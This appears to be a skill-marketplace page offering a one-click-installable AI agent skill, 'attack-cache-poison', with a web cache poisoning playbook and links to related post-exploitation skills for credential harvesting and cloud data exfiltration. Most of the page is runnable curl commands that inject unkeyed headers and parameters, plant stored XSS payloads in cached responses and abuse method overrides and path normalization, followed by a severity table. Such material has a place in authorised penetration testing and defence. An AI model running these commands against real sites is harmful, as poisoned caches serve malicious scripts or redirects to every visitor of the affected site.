원클릭으로
attack-cache-poison
Web cache poisoning — unkeyed header/parameter injection to serve malicious content to all users
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
메뉴
Web cache poisoning — unkeyed header/parameter injection to serve malicious content to all users
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
SOC 직업 분류 기준
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
| name | attack-cache-poison |
| description | Web cache poisoning — unkeyed header/parameter injection to serve malicious content to all users |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["cache-poisoning","web","xss","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-444","CWE-525"] |
| chains_with | ["attack-host-header","attack-open-redirect"] |
| prerequisites | [] |
| severity_boost | {"attack-host-header":"Host header + cache = stored XSS/redirect affecting all users"} |
Inject malicious content into cached responses via unkeyed inputs (headers, parameters) so that subsequent users receive the poisoned response.
# Check cache headers
curl -s -D- https://TARGET/ | grep -i "x-cache\|age\|cache-control\|cf-cache\|x-varnish"
# Identify cache key components (vary header)
curl -s -D- https://TARGET/ | grep -i "vary"
Test headers that are reflected in response but NOT part of cache key:
# X-Forwarded-Host
curl -s https://TARGET/ -H "X-Forwarded-Host: evil.com" | grep "evil.com"
# X-Forwarded-Scheme
curl -s https://TARGET/ -H "X-Forwarded-Scheme: nothttps" | grep "redirect"
# X-Original-URL / X-Rewrite-URL
curl -s https://TARGET/ -H "X-Original-URL: /admin"
# Custom headers
curl -s https://TARGET/ -H "X-Forwarded-Port: 1234"
# Poison with XSS payload
curl -s https://TARGET/ \
-H "X-Forwarded-Host: evil.com\"><script>alert(1)</script>"
# Wait for cache to store, then verify
curl -s https://TARGET/ | grep "alert(1)"
# Find parameters not in cache key
curl -s "https://TARGET/?cb=123" -D- | grep "x-cache"
curl -s "https://TARGET/?utm_source=evil" | grep "evil"
# Reflected unkeyed parameter → stored XSS
curl -s "https://TARGET/?evil=<script>alert(1)</script>"
# Fat GET — body in GET request
curl -s https://TARGET/ -X GET -d "param=<script>alert(1)</script>"
# POST → GET cache confusion
curl -s https://TARGET/ -X POST \
-H "X-HTTP-Method-Override: GET" \
-d "param=evil"
# Path normalization differences
curl -s "https://TARGET/path/../admin"
curl -s "https://TARGET/PATH" vs "https://TARGET/path"
curl -s "https://TARGET/path;.js"
| Finding | Severity |
|---|---|
| Cached XSS payload served to other users | Critical (P1) |
| Cached redirect to attacker domain | High (P2) |
| Denial of service via cache poisoning (error page cached) | Medium (P3) |
| Unkeyed header reflected (no cache impact proven) | Low (P4) |